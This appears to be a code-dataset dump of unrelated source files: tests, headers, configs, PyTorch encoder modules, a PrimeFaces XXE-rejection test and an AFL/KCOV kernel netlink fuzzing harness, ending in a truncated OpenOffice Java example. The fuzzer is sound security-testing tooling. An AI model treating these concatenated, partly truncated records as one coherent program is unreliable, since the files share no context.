max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
3,380 | # coding=utf-8
# Copyright 2021 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""cardiotox dataset."""
from tensorflow_datasets.graphs.cardiotox import cardiotox
import tensorflow_datasets.public_api as tfds
class CardiotoxTest(tfds.testing.DatasetBuilderTestCase):
  """Tests for cardiotox dataset.

  Runs the standard TFDS builder test suite against the fake example data
  shipped with this test.
  """
  DATASET_CLASS = cardiotox.Cardiotox
  SPLITS = {
      'train': 4,  # Number of fake train examples
      'validation': 2,  # Number of fake validation examples
      'test': 2,  # Number of fake test examples
      'test2': 2,  # Number of fake examples in the second test split
  }

  @classmethod
  def setUpClass(cls):
    # Redirect the builder's download location to the fake-data directory
    # before the base class generates the dataset.
    cardiotox._DATA_URL = cls.dummy_data
    super().setUpClass()
# Allow running this test file directly; delegates to the TFDS test runner.
if __name__ == '__main__':
  tfds.testing.test_main()
| 405 |
312 | <reponame>Fruit-Pi/mpp
/*
*
* Copyright 2015 Rockchip Electronics Co. LTD
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifndef __DXVA_SYNTAX_H__
#define __DXVA_SYNTAX_H__
#include "rk_type.h"
/*
 * DXVA2 compressed-buffer type identifiers. The enum name and values mirror
 * the corresponding enumeration in Microsoft's dxva2api.h (including the
 * upstream "BitStreamDate" spelling), so they must not be renumbered.
 */
enum __MIDL___MIDL_itf_dxva2api_0000_0000_0012 {
    DXVA2_PictureParametersBufferType = 0,
    DXVA2_MacroBlockControlBufferType = 1,
    DXVA2_ResidualDifferenceBufferType = 2,
    DXVA2_DeblockingControlBufferType = 3,
    DXVA2_InverseQuantizationMatrixBufferType = 4,
    DXVA2_SliceControlBufferType = 5,
    DXVA2_BitStreamDateBufferType = 6,
    DXVA2_MotionVectorBuffer = 7,
    DXVA2_FilmGrainBuffer = 8
};
/*
 * Stripped-down port of the DXVA2 picture-decode configuration struct.
 * Only ConfigBitstreamRaw is kept; the remaining fields of the original
 * Windows structure are left commented out to document the full layout.
 */
typedef struct _DXVA2_ConfigPictureDecode {
    //GUID guidConfigBitstreamEncryption;
    //GUID guidConfigMBcontrolEncryption;
    //GUID guidConfigResidDiffEncryption;
    RK_U32 ConfigBitstreamRaw;
    //UINT ConfigMBcontrolRasterOrder;
    //UINT ConfigResidDiffHost;
    //UINT ConfigSpatialResid8;
    //UINT ConfigResid8Subtraction;
    //UINT ConfigSpatialHost8or9Clipping;
    //UINT ConfigSpatialResidInterleaved;
    //UINT ConfigIntraResidUnsigned;
    //UINT ConfigResidDiffAccelerator;
    //UINT ConfigHostInverseScan;
    //UINT ConfigSpecificIDCT;
    //UINT Config4GroupedCoefs;
    //USHORT ConfigMinRenderTargetBuffCount;
    //USHORT ConfigDecoderSpecific;
} DXVA2_ConfigPictureDecode;
/*
 * Describes one compressed buffer handed to the decoder; modelled on the
 * DXVA2 structure of the same name.
 */
typedef struct _DXVA2_DecodeBufferDesc {
    RK_U32 CompressedBufferType; /* one of the DXVA2_*BufferType values above */
    RK_U32 BufferIndex;
    RK_U32 DataOffset;           /* byte offset of payload within the buffer */
    RK_U32 DataSize;             /* payload size in bytes */
    RK_U32 FirstMBaddress;
    RK_U32 NumMBsInBuffer;
    RK_U32 Width;
    RK_U32 Height;
    RK_U32 Stride;
    RK_U32 ReservedBits;
    void *pvPVPState;            /* opaque protected-playback state, may be NULL */
} DXVA2_DecodeBufferDesc;
#endif /*__DXVA_SYNTAX_H__*/
| 934 |
5,169 | {
"name": "RevenueXBeta",
"version": "0.1.0",
"summary": "Subscription and purchase tracking system",
"description": "Secure, reliable, and free to use in-app purchase server. Build and manage your app business without having to maintain purchase infrastructure.",
"homepage": "https://bitbucket.org/mobilexturkey/revenuex-ios-sdk-public.git",
"license": {
"type": "MIT"
},
"authors": {
"Mobilex, Inc.": "<EMAIL>"
},
"source": {
"git": "https://bitbucket.org/mobilexturkey/revenuex-ios-sdk-public.git",
"tag": "0.1.0"
},
"documentation_url": "https://bitbucket.org/mobilexturkey/revenuex-ios-sdk-public/src/master/README.md",
"resources": "RevenueX/**/*.{xcdatamodeld}",
"frameworks": "StoreKit",
"swift_versions": "5.0",
"platforms": {
"ios": "10.0"
},
"source_files": "RevenueX/**/*.{swift}",
"swift_version": "5.0"
}
| 346 |
1,443 | <gh_stars>1000+
{
"copyright": "<NAME>, http://psykzz.co.uk",
"url": "http://psykzz.co.uk",
"email": "<EMAIL>",
"format": "txt",
"theme": "black-beauty",
"gravatar": true
}
| 84 |
965 | <gh_stars>100-1000
// This example uses the CWnd::IsWindowVisible() function to
// determine if a dialog box is visible. If it is not, it calls
// CWnd::ShowWindow with the SW_SHOWNORMAL command.
// Shows the modeless dialog with SW_SHOWNORMAL if it is not already visible.
void CMainFrame::DisplayModeless()
{
    if (m_Modeless.IsWindowVisible())
        return;
    m_Modeless.ShowWindow(SW_SHOWNORMAL);
}
// This example uses the CWnd::IsWindowVisible() function to
// determine if a dialog box is visible. If it is, it calls
// CWnd::ShowWindow with the SW_HIDE command.
// Hides the modeless dialog with SW_HIDE if it is currently visible.
void CMainFrame::HideModeless()
{
    if (!m_Modeless.IsWindowVisible())
        return;
    m_Modeless.ShowWindow(SW_HIDE);
}
370 | /** @file tcpclient.h
* @brief Open a TCP connection to a server.
*/
/* Copyright (C) 2007,2008,2010 <NAME>
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License as
* published by the Free Software Foundation; either version 2 of the
* License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
#ifndef XAPIAN_INCLUDED_TCPCLIENT_H
#define XAPIAN_INCLUDED_TCPCLIENT_H
#include <string>
namespace TcpClient {

/** Attempt to open a TCP/IP socket connection to a server.
 *
 *  Connect to the server running on port @a port of host @a hostname.
 *  Give up trying to connect after @a timeout_connect seconds.
 *
 *  @param hostname         Host name (or address) of the server.
 *  @param port             TCP port to connect to.
 *  @param timeout_connect  Seconds to wait before giving up on the connect.
 *  @param tcp_nodelay      Presumably enables TCP_NODELAY on the socket --
 *                          the implementation is not visible here; confirm.
 *
 *  @return a connected socket descriptor (failure behaviour is defined by
 *          the implementation, which is not part of this header).
 */
int open_socket(const std::string & hostname, int port,
                double timeout_connect, bool tcp_nodelay);

}
#endif // XAPIAN_INCLUDED_TCPCLIENT_H
| 404 |
1,773 | /*
* The MIT License
*
* Copyright (c) 2009-2021 PrimeTek
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package org.primefaces.component.feedreader;
import com.rometools.rome.io.ParsingFeedException;
import java.net.URL;
import java.util.List;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.*;
public class FeedReaderTest {
@Test()
public void parseXXEbomb() throws Exception {
// Check CVE-2021-33813 can not be triggered in Primefaces
// See https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33813
// See https://alephsecurity.com/vulns/aleph-2021003
URL feed = FeedReaderTest.class.getResource("/org/primefaces/feeds/XXEbomb.xml");
assertThrows(ParsingFeedException.class, () -> new FeedInput().parse(feed.toString(), 1));
}
@Test()
public void parseXXE() throws Exception {
URL feed = FeedReaderTest.class.getResource("/org/primefaces/feeds/XXE.xml");
assertThrows(ParsingFeedException.class, () -> new FeedInput().parse(feed.toString(), 1));
}
@Test()
public void parseRSS() throws Exception {
URL feed = FeedReaderTest.class.getResource("/org/primefaces/feeds/RSS2.0.xml");
List rss = new FeedInput().parse(feed.toString(), 10);
assertNotNull(rss);
assertEquals(2, rss.size());
}
} | 785 |
833 | <reponame>gozdal/cloudflare-blog
#include <fcntl.h>
#include <getopt.h>
#include <linux/netlink.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include "common.h"
/* Runtime options parsed from the command line in main(). */
struct state {
    int one_run;      /* -r: exit after the first fuzz iteration */
    int verbose;      /* -v: print progress to stderr */
    int dump;         /* -d: print raw KCOV offsets */
    int no_kcov;      /* -k: skip KCOV coverage collection */
    int netns;        /* -n: recreate the network namespace every N runs */
    char *user_dmesg; /* -m: file that receives a copy of /dev/kmsg */
};
/* Print command-line help for `command` to stderr. */
static void usage(const char *command)
{
    fprintf(stderr,
            "Usage:\n"
            "\n"
            " %s [options]\n"
            "\n"
            "Options:\n"
            "\n"
            " -v --verbose Print stuff to stderr\n"
            " -r --one-run Exit after first data read\n"
            " -d --dump Dump KCOV offsets\n"
            " -k --no-kcov Don't attempt to run KCOV\n"
            " -n --netns=N Set up new a namespace every N tests\n"
            " -m --dmesg=FILE Copy /dev/kmsg into a file\n"
            "\n",
            command);
}
/*
 * AFL fork-server driver that fuzzes the kernel netlink interface.
 *
 * Each iteration reads an AFL-generated input from stdin, uses byte 0 as
 * the netlink protocol and bytes 1-4 as the bind groups mask, sends the
 * remainder as a netlink message, and maps KCOV %rip coverage into the AFL
 * shared bitmap. Kernel crashes are detected by scanning /dev/kmsg.
 *
 * Fix vs. previous revision: the argument to hsiphash_static() had been
 * corrupted by an HTML-entity mangling ("&curren;t_loc"); it is restored to
 * &current_loc so the file compiles again.
 */
int main(int argc, char **argv)
{
    static struct option long_options[] = {
        {"verbose", no_argument, 0, 'v'},
        {"one-run", no_argument, 0, 'r'},
        {"dump", no_argument, 0, 'd'},
        {"help", no_argument, 0, 'h'},
        {"no-kcov", no_argument, 0, 'k'},
        {"netns", optional_argument, 0, 'n'},
        {"dmesg", required_argument, 0, 'm'},
        {NULL, 0, 0, 0}};
    const char *optstring = optstring_from_long_options(long_options);

    struct state *state = calloc(1, sizeof(struct state));

    optind = 1;
    while (1) {
        int option_index = 0;
        int arg = getopt_long(argc, argv, optstring, long_options,
                              &option_index);
        if (arg == -1) {
            break;
        }

        switch (arg) {
        case 0:
            fprintf(stderr, "Unknown option: %s", argv[optind]);
            exit(-1);
            break;
        case 'h':
            usage(argv[0]);
            exit(0);
            break;
        case '?':
            exit(-1);
            break;
        case 'v':
            state->verbose++;
            break;
        case 'r':
            state->one_run++;
            break;
        case 'd':
            state->dump++;
            break;
        case 'k':
            state->no_kcov++;
            break;
        case 'n':
            if (optarg) {
                state->netns = atoi(optarg);
            } else {
                state->netns++;
            }
            break;
        case 'm':
            state->user_dmesg = optarg;
            break;
        default:
            fprintf(stderr, "Unknown option %c: %s\n", arg,
                    argv[optind]);
            exit(-1);
        }
    }

    /* We never fork; report a fake child pid to the AFL fork server. */
    uint32_t child_pid = getpid() + 1;

    struct forksrv *forksrv = forksrv_new();
    forksrv_welcome(forksrv);
    uint8_t *afl_area_ptr = forksrv_area_ptr(forksrv);

    struct kcov *kcov = NULL;
    uint64_t *kcov_cover_buf = NULL;
    if (state->no_kcov == 0) {
        kcov = kcov_new();
        kcov_cover_buf = kcov_cover(kcov);
    }

    if (state->verbose) {
        fprintf(stderr, "[.] Starting v=%d r=%d netns=%d\n",
                state->verbose, state->one_run, state->netns);
    }

    /* Read on dmesg /dev/kmsg for crashes. */
    int dmesg_fs = -1;
    dmesg_fs = open("/dev/kmsg", O_RDONLY | O_NONBLOCK);
    if (dmesg_fs < 0) {
        PFATAL("open(/dev/kmsg)");
    }
    /* Skip the pre-existing log; only new lines matter. */
    lseek(dmesg_fs, 0, SEEK_END);

    /* Perhaps copy over dmesg data to user file */
    int user_dmesg_fs = -1;
    if (state->user_dmesg) {
        user_dmesg_fs = open(state->user_dmesg,
                             O_APPEND | O_WRONLY | O_CREAT, 0644);
        if (user_dmesg_fs < 0) {
            PFATAL("can't open %s for append", state->user_dmesg);
        }
        char hello[] = ",;: Restarting fuzzing\n";
        int x = write(user_dmesg_fs, hello, strlen(hello));
        (void)x;
    }

    /* MAIN LOOP */
    int run_no;
    int force_new_netns = 1;
    for (run_no = 0; 1; run_no += 1) {
        /* Convince AFL we started a child. */
        forksrv_cycle(forksrv, child_pid);

        /* Load input from AFL (stdin) */
        char buf[512 * 1024];
        memset(buf, 0, 32);
        int buf_len = read(0, buf, sizeof(buf));
        if (buf_len < 0) {
            PFATAL("read(stdin)");
        }
        /* The first 5 bytes (protocol + groups) are always consumed;
         * pad short inputs with the zeroes memset above. */
        if (buf_len < 5) {
            buf_len = 5;
        }

        if (state->verbose) {
            fprintf(stderr, "[.] %d bytes on input\n", buf_len);
        }

        int kcov_len = 0;

        /* Once every netns runs cycle network namespaces */
        if ((state->netns && (run_no % state->netns) == 0) ||
            force_new_netns != 0) {
            netns_new();
            force_new_netns = 0;
        }

        /* START coverage collection on the current task. */
        if (kcov) {
            kcov_enable(kcov);
        }

        /* Byte 0 selects the netlink protocol family. */
        int netlink_fd =
            socket(AF_NETLINK, SOCK_RAW | SOCK_NONBLOCK, buf[0]);
        if (netlink_fd < 0) {
            goto error;
        }

        /* Bytes 1-4 (big-endian) form the multicast groups mask. */
        struct sockaddr_nl sa = {
            .nl_family = AF_NETLINK,
            .nl_groups = (buf[1] << 24) | (buf[2] << 16) |
                         (buf[3] << 8) | buf[4],
        };

        int r = bind(netlink_fd, (struct sockaddr *)&sa, sizeof(sa));
        if (r < 0) {
            goto error;
        }

        /* The remaining payload is sent as the netlink message body. */
        struct iovec iov = {&buf[5], buf_len - 5};
        struct sockaddr_nl sax = {
            .nl_family = AF_NETLINK,
        };
        struct msghdr msg = {&sax, sizeof(sax), &iov, 1, NULL, 0, 0};
        r = sendmsg(netlink_fd, &msg, 0);
        if (r != -1) {
            /* Drain one reply so response-path code is exercised too. */
            char buf[8192];
            struct iovec iov = {buf, sizeof(buf)};
            struct sockaddr_nl sa;
            struct msghdr msg = {&sa, sizeof(sa), &iov, 1,
                                 NULL, 0, 0};
            recvmsg(netlink_fd, &msg, 0);
        }
    error:
        if (netlink_fd >= 0) {
            close(netlink_fd);
        }

        /* STOP coverage */
        if (kcov) {
            kcov_len = kcov_disable(kcov);
        }

        /* Read recorded %rip */
        int i;
        uint64_t afl_prev_loc = 0;
        for (i = 0; i < kcov_len; i++) {
            uint64_t current_loc = kcov_cover_buf[i + 1];
            uint64_t hash = hsiphash_static(&current_loc,
                                            sizeof(unsigned long));
            /* AFL-style edge encoding: hash of current PC xored with
             * the (shifted) hash of the previous PC. */
            uint64_t mixed = (hash & 0xffff) ^ afl_prev_loc;
            afl_prev_loc = (hash & 0xffff) >> 1;

            uint8_t *s = &afl_area_ptr[mixed];
            int r = __builtin_add_overflow(*s, 1, s);
            if (r) {
                /* Boxing. AFL is fine with overflows,
                 * but we can be better. Drop down to
                 * 128 on overflow. */
                *s = 128;
            }

            if (state->dump) {
                printf("0x%016lx%s\n", current_loc, "");
            }
        }

        if (state->verbose) {
            fprintf(stderr, "[.] %d measurements\n", kcov_len);
        }

        /* Check dmesg if there was something interesting */
        int crashed = 0;
        while (1) {
            // /dev/kmsg gives us one line per read
            char buf[8192];
            int r = read(dmesg_fs, buf, sizeof(buf) - 1);
            if (r <= 0) {
                break;
            }

            if (state->user_dmesg) {
                int x = write(user_dmesg_fs, buf, r);
                (void)x;
            }

            buf[r] = '\x00';
            /* Heuristics for an oops/panic line. */
            if (strstr(buf, "Call Trace") != NULL ||
                strstr(buf, "RIP:") != NULL ||
                strstr(buf, "Code:") != NULL) {
                crashed += 1;
            }
        }
        if (crashed) {
            fprintf(stderr, "[!] BUG detected\n");
            /* Report SIGSEGV-like status so AFL saves the input. */
            forksrv_status(forksrv, 139);
            force_new_netns = 1;
        } else {
            forksrv_status(forksrv, 0);
        }
        if (state->one_run) {
            break;
        }
    }

    forksrv_free(forksrv);
    if (kcov) {
        kcov_free(kcov);
    }
    return 0;
}
| 3,138 |
1,088 | <reponame>hgroll/tikzplotlib<gh_stars>1000+
def plot():
    """Build a 2x2 figure exercising ``plt.axis("equal")`` in four variants.

    Serves as a regression fixture: ``test()`` below compares the converted
    output against a reference ``.tex`` file.

    Returns:
        The matplotlib figure containing the four subplots.
    """
    import numpy as np
    from matplotlib import pyplot as plt

    fig = plt.figure()
    # 10 points around a circle of radius 3 (deliberately coarse).
    an = np.linspace(0, 2 * np.pi, 10)

    plt.subplot(221)
    plt.plot(3 * np.cos(an), 3 * np.sin(an))
    plt.title("not equal, looks like ellipse", fontsize=10)

    plt.subplot(222)
    plt.plot(3 * np.cos(an), 3 * np.sin(an))
    plt.axis("equal")
    plt.title("equal, looks like circle", fontsize=10)

    plt.subplot(223)
    plt.plot(3 * np.cos(an), 3 * np.sin(an))
    plt.axis("equal")
    plt.axis([-3, 3, -3, 3])
    plt.title("looks like circle, even after changing limits", fontsize=10)

    plt.subplot(224)
    plt.plot(3 * np.cos(an), 3 * np.sin(an))
    plt.axis("equal")
    plt.axis([-3, 3, -3, 3])
    plt.plot([0, 4], [0, 4])
    plt.title("still equal after adding line", fontsize=10)

    return fig
def test():
    """Compare the tikzplotlib conversion of plot() against the stored .tex."""
    from .helpers import assert_equality

    reference_file = __file__[:-3] + "_reference.tex"
    assert_equality(plot, reference_file)
| 451 |
14,425 | <filename>hadoop-common-project/hadoop-common/src/test/java/org/apache/hadoop/security/authorize/TestDefaultImpersonationProvider.java
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.security.authorize;
import static org.mockito.Mockito.when;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.UserGroupInformation;
import org.apache.hadoop.test.LambdaTestUtils;
import org.junit.After;
import org.junit.Before;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.Timeout;
import org.mockito.Mockito;
import java.util.concurrent.TimeUnit;
/**
* Test class for @DefaultImpersonationProvider
*/
public class TestDefaultImpersonationProvider {

  private String proxyUser;
  private String user;
  private DefaultImpersonationProvider provider;
  // Mocked UGIs: userGroupInformation plays the proxied caller,
  // realUserUGI the real (proxying) user behind it.
  private UserGroupInformation userGroupInformation = Mockito
      .mock(UserGroupInformation.class);
  private UserGroupInformation realUserUGI = Mockito
      .mock(UserGroupInformation.class);
  private Configuration conf;

  // Fail any single test that runs longer than 10 seconds.
  @Rule
  public Timeout globalTimeout = new Timeout(10000, TimeUnit.MILLISECONDS);

  @Before
  public void setup() {
    conf = new Configuration();
    provider = new DefaultImpersonationProvider();

    // Setup 3 proxy users: note the third name contains a space.
    conf.set("hadoop.proxyuser.fakeuser.groups", "*");
    conf.set("hadoop.proxyuser.fakeuser.hosts", "*");
    conf.set("hadoop.proxyuser.test.user.groups", "*");
    conf.set("hadoop.proxyuser.test.user.hosts", "*");
    conf.set("hadoop.proxyuser.test user2.groups", "*");
    conf.set("hadoop.proxyuser.test user2.hosts", "*");
    provider.setConf(conf);
    provider.init(ProxyUsers.CONF_HADOOP_PROXYUSER);
  }

  // Configured proxy users ("fakeuser", "test.user") must be authorized.
  @Test
  public void testAuthorizationSuccess() throws AuthorizationException {
    proxyUser = "fakeuser";
    user = "dummyUser";
    when(realUserUGI.getShortUserName()).thenReturn(proxyUser);
    when(userGroupInformation.getRealUser()).thenReturn(realUserUGI);
    provider.authorize(userGroupInformation, "2.2.2.2");

    user = "somerandomuser";
    proxyUser = "test.user";
    when(realUserUGI.getShortUserName()).thenReturn(proxyUser);
    when(userGroupInformation.getRealUser()).thenReturn(realUserUGI);
    provider.authorize(userGroupInformation, "2.2.2.2");
  }

  // "test user2" (with a space) is presumably not matched by the proxy-user
  // config parsing, so authorization must be rejected.
  @Test
  public void testAuthorizationFailure() throws Exception {
    user = "dummyUser";
    proxyUser = "test user2";
    when(realUserUGI.getShortUserName()).thenReturn(proxyUser);
    when(realUserUGI.getUserName()).thenReturn(proxyUser);
    when(userGroupInformation.getUserName()).thenReturn(user);
    when(userGroupInformation.getRealUser()).thenReturn(realUserUGI);
    LambdaTestUtils.intercept(AuthorizationException.class, "User: "
        + proxyUser + " is not allowed to impersonate " + user, () ->
        provider.authorize(userGroupInformation, "2.2.2.2"));
  }

  @After
  public void clear() {
    provider = null;
    conf = null;
    userGroupInformation = null;
    realUserUGI = null;
  }
}
| 1,214 |
763 | <reponame>zabrewer/batfish
package org.batfish.datamodel.questions;
import com.fasterxml.jackson.annotation.JsonProperty;
import javax.annotation.Nullable;
import javax.annotation.ParametersAreNonnullByDefault;
import org.batfish.common.BfConsts;
/** Settings for field of complex {@link org.batfish.datamodel.questions.Variable}. */
@ParametersAreNonnullByDefault
/** Settings for field of complex {@link org.batfish.datamodel.questions.Variable}. */
@ParametersAreNonnullByDefault
public final class Field {

  // Serialized under BfConsts.PROP_OPTIONAL.
  private boolean _optional;

  // Expected value type of the field; null when unconstrained.
  // Serialized under BfConsts.PROP_TYPE.
  @Nullable private Variable.Type _type;

  /** Returns whether this field is optional. */
  @JsonProperty(BfConsts.PROP_OPTIONAL)
  public boolean getOptional() {
    return _optional;
  }

  /** Returns the expected type of this field, or null if unconstrained. */
  @Nullable
  @JsonProperty(BfConsts.PROP_TYPE)
  public Variable.Type getType() {
    return _type;
  }

  @JsonProperty(BfConsts.PROP_OPTIONAL)
  public void setOptional(boolean optional) {
    _optional = optional;
  }

  @JsonProperty(BfConsts.PROP_TYPE)
  public void setType(Variable.Type type) {
    _type = type;
  }
}
| 317 |
706 | <gh_stars>100-1000
from __future__ import print_function, division
import torch
import torch.nn as nn
class mfcc_encoder(nn.Module):
def __init__(self, norm_layer=nn.BatchNorm2d):
super(mfcc_encoder, self).__init__()
use_bias = norm_layer == nn.InstanceNorm2d
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 3),
stride=(3, 2), padding=(1, 2), bias=use_bias)
self.pool1 = nn.AvgPool2d((2, 2), 2)
self.bn1 = norm_layer(64)
self.conv2 = nn.Conv2d(64, 128, (3, 3), 2, 1, bias=use_bias)
self.pool2 = nn.AvgPool2d(2,2)
self.bn2 = norm_layer(128)
self.conv3 = nn.Conv2d(128, 256, (3, 3), 1, 0, bias=use_bias)
self.bn3 = norm_layer(256)
self.conv4 = nn.Conv2d(256, 512, (2, 2), 1, bias=use_bias)
self.bn5 = norm_layer(512)
self.tanh = nn.Tanh()
def forward(self, x):
net1 = self.conv1(x)
net1 = self.bn1(net1)
net1 = self.relu(net1)
net = self.conv2(net1)
net = self.bn2(net)
net = self.relu(net)
net = self.conv3(net)
net = self.bn3(net)
net = self.relu(net)
net = self.conv4(net)
return net
class mfcc_encoder_alter(nn.Module):
def __init__(self):
super(mfcc_encoder_alter, self).__init__()
self.relu = nn.LeakyReLU(0.2, True)
self.conv1 = nn.Conv2d(1, 64, kernel_size=(3, 12), stride=(1,1), padding=0, bias=False)
self.bn1 = nn.BatchNorm1d(64)
self.pool1 = nn.MaxPool2d(1, 3)
self.conv2 = nn.Conv2d(64, 256, (3, 1), 1, (1, 0), bias=False)
self.bn2 = nn.BatchNorm2d(256)
self.pool2 = nn.MaxPool2d(1, 2)
self.conv3 = nn.Conv2d(256, 512, (3, 1), 1, bias=False)
def forward(self, x):
net = self.conv1(x)
net = self.relu(self.bn1(net))
net = self.pool1(net)
net = self.conv2(net)
net = self.relu(self.bn2(net))
net = self.pool2(net)
net = self.conv3(net)
return net
class mfcc_encoder_two(nn.Module):
    """Fuses both MFCC encoders into a per-frame 256-dim embedding.

    ``opt`` must expose ``mfcc_length`` and ``mfcc_width`` attributes.
    """

    def __init__(self, opt):
        super(mfcc_encoder_two, self).__init__()
        self.opt = opt
        self.model1 = mfcc_encoder()
        self.model2 = mfcc_encoder_alter()
        self.fc = nn.Linear(1024, 256)

    def _forward(self, x):
        # Concatenate both encoders' features channel-wise, flatten to 1024,
        # then project down to 256.
        merged = torch.cat((self.model1.forward(x), self.model2.forward(x)), 1)
        return self.fc(merged.view(-1, 1024))

    def forward(self, x):
        frames = x.view(-1, 1, self.opt.mfcc_length, self.opt.mfcc_width)
        embedded = self._forward(frames)
        return embedded.view(x.size(0), -1, 256)
| 1,490 |
923 | // Ouzel by <NAME>
#ifndef OUZEL_PLATFORM_COCOA_WINDOW_HPP
#define OUZEL_PLATFORM_COCOA_WINDOW_HPP
#ifdef __OBJC__
# import <Cocoa/Cocoa.h>
typedef NSWindow* NSWindowPtr;
#else
# include <objc/NSObjCRuntime.h>
using NSWindowPtr = id;
#endif
namespace ouzel::platform::cocoa
{
class Window final
{
public:
};
}
#endif // OUZEL_PLATFORM_COCOA_WINDOW_HPP
| 179 |
679 | <gh_stars>100-1000
/**************************************************************
*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*************************************************************/
import com.sun.star.beans.PropertyValue;
import com.sun.star.beans.XPropertySet;
import com.sun.star.uno.XComponentContext;
import com.sun.star.comp.helper.Bootstrap;
import com.sun.star.container.XEnumeration;
import com.sun.star.container.XEnumerationAccess;
import com.sun.star.frame.XComponentLoader;
import com.sun.star.frame.XController;
import com.sun.star.frame.XModel;
import com.sun.star.lang.XComponent;
import com.sun.star.lang.XMultiComponentFactory;
import com.sun.star.sheet.XCellAddressable;
import com.sun.star.sheet.XCellRangesQuery;
import com.sun.star.sheet.XSheetCellRanges;
import com.sun.star.sheet.XSpreadsheet;
import com.sun.star.sheet.XSpreadsheetDocument;
import com.sun.star.sheet.XSpreadsheetView;
import com.sun.star.sheet.XSpreadsheets;
import com.sun.star.table.XCell;
import com.sun.star.uno.UnoRuntime;
/**
 * Minimal UNO client example: connects to a running Office instance,
 * creates a new Calc spreadsheet and demonstrates cell access, enum-typed
 * properties, PropertyValue sequences and XEnumerationAccess.
 */
public class FirstLoadComponent {

    /** Creates a new instance of FirstLoadComponent */
    public FirstLoadComponent() {
    }

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {
        try {
            // get the remote office component context
            XComponentContext xRemoteContext = Bootstrap.bootstrap();
            if (xRemoteContext == null) {
                System.err.println("ERROR: Could not bootstrap default Office.");
            }

            XMultiComponentFactory xRemoteServiceManager = xRemoteContext.getServiceManager();

            Object desktop = xRemoteServiceManager.createInstanceWithContext(
                "com.sun.star.frame.Desktop", xRemoteContext);
            XComponentLoader xComponentLoader = (XComponentLoader)
                UnoRuntime.queryInterface(XComponentLoader.class, desktop);

            // Open a blank Calc document.
            PropertyValue[] loadProps = new PropertyValue[0];
            XComponent xSpreadsheetComponent = xComponentLoader.loadComponentFromURL("private:factory/scalc", "_blank", 0, loadProps);

            XSpreadsheetDocument xSpreadsheetDocument = (XSpreadsheetDocument)
                UnoRuntime.queryInterface(XSpreadsheetDocument.class,
                                          xSpreadsheetComponent);

            XSpreadsheets xSpreadsheets = xSpreadsheetDocument.getSheets();
            xSpreadsheets.insertNewByName("MySheet", (short)0);
            com.sun.star.uno.Type elemType = xSpreadsheets.getElementType();
            System.out.println(elemType.getTypeName());

            Object sheet = xSpreadsheets.getByName("MySheet");
            XSpreadsheet xSpreadsheet = (XSpreadsheet)UnoRuntime.queryInterface(
                XSpreadsheet.class, sheet);

            // Fill A1/A2 and let A3 sum them.
